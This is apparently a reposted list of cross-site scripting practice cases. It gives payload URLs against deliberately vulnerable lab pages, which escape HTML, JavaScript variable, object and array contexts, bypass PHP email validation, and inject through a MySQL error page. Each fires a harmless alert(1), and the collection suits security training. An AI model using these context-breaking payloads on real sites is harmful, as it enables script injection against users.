Multi Reflection (Pro Only)

Case 14 - Double Injection in HTML Context with Double Quotes

https://brutelogic.com.br/multi/double-html.php?p="</a><svg onload=alert(1)>

Case 15 - Double Injection in Mixed Context (HTML + JS) with Default Quotes

https://brutelogic.com.br/multi/double-mixed.php?p="</a><svg onload=alert(1)>

Case 16 - Quoteless Inline Double Injection in JS variables

 https://brutelogic.com.br/multi/js-inline.php?p=;alert(1)//


Case 17 - Quoteless Inline Double Injection in JS object

https://brutelogic.com.br/multi/js-object.php?p=};alert(1)//


Case 18 - Quoteless Inline Double Injection in JS object with Nested Array

https://brutelogic.com.br/multi/js-object2.php?p=}]};alert(1)//

Case 19 - Quoteless Inline Double Injection in JS object with Nested Function

https://brutelogic.com.br/multi/js-object3.php?p=}}};alert(1)//

Special Cases (Pro Only)

Case 20 - SQLi error-based HTML Injection

http://testphp.vulnweb.com/listproducts.php?cat=1"

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '€œ' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74 

http://testphp.vulnweb.com/listproducts.php?cat=1"<svg onload=alert(1)>

Case 21 - PHP FILTER_VALIDATE_EMAIL Bypass HTML Injection

https://brutelogic.com.br/tests/email.php?email="<script>alert(1);</script>"@brutelogic.com.br

原文地址:https://www.cnblogs.com/hack404/p/10722383.html